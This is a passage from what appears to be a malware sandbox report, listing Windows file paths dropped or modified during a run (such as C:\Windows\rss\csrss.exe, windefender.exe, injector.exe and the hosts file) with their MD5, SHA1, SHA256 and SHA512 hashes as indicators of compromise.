| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 1ff57801793d3fb22f74fde36f597358 |
| SHA1 | 4508757a4119e742af662e8590060048d5a3a272 |
| SHA256 | f87642f786a8feac8afc599c52dd6629fea175401d1ac2130b9cc407730756be |
| SHA512 | 9e98bc7a48fba834442d20df17008d9b033a5dcf2b8e61ecbf85c3fed1eb258401074c62ec4c341b003241114f9516bba2dc5b6d7dc8c70718f747fa430d5be9 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 719b3aaabad247c7e3e168302642b20a |
| SHA1 | 503d0a10e62a42195dca3d1e31daf3b6a579dd82 |
| SHA256 | 36299615fbb6ecae16b918cd91b3b6c20370811a7fa3f4dfb7468cc6148a5028 |
| SHA512 | e7d8de2bf0033a076f86018eabcf88e922693cf0be4bf90973e079a9ed0b3cfaa548279168170fae494baadb60f22d5a4d657680af0368f97e1729c9077e4bad |
C:\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
C:\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | b868d3f1ad475fe3e603d18c105f20a3 |
| SHA1 | 5c39dd27afd0e3d7012c7345290728381a36a025 |
| SHA256 | aa5e2f5b06b2e4dea8449e92b37ff1c975c8646e6d40725c078bd7cc838134ee |
| SHA512 | 4123a31b8136278aa1289a829663badfbf011cbf788d941f8ac99dc4144272292b280cba428536b4f8247a4042c666e36fbf8114356273d4d8415c30b1c345b6 |
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| MD5 | a64a886a695ed5fb9273e73241fec2f7 |
| SHA1 | 363244ca05027c5beb938562df5b525a2428b405 |
| SHA256 | 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144 |
| SHA512 | 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 8046699a5948cf72713efbf617937062 |
| SHA1 | 43c8a3fbf1072397acfa1b91d650267386e5e0ec |
| SHA256 | c75f1f7aae2b393cbeeaffd02cdb4647ff2e15c79f4b141e920d5e6b2ccb0b7a |
| SHA512 | ffd6a72189c78b1765774a59623233db66daaeff8ba17f727b1435232395790d13b34723ca0cdc6d4162c0949d159cda2e1b397057aa7bdde7a76009bfddca74 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 20bcfd66dbd06138f4dcfc776e8d2105 |
| SHA1 | 062c5d034fa1ad72b55c7854ba51fb3497548856 |
| SHA256 | 9d16786b5e61bd3341b686b15fb9ba35a1646d62e9c23768b3446ce58f9a5e03 |
| SHA512 | 487c2f6d3d4e105b96001ed1ecd3da2fff44e3356e078d1af4d261956b1fa4368bded645729810dfed3b7047aced1a069836a440b98071b2954aef0563fe9658 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 00930b40cba79465b7a38ed0449d1449 |
| SHA1 | 4b25a89ee28b20ba162f23772ddaf017669092a5 |
| SHA256 | eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01 |
| SHA512 | cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b42c70c1dbf0d1d477ec86902db9e986 |
| SHA1 | 1d1c0a670748b3d10bee8272e5d67a4fabefd31f |
| SHA256 | 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a |
| SHA512 | 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| MD5 | a64a886a695ed5fb9273e73241fec2f7 |
| SHA1 | 363244ca05027c5beb938562df5b525a2428b405 |
| SHA256 | 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144 |
| SHA512 | 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474 |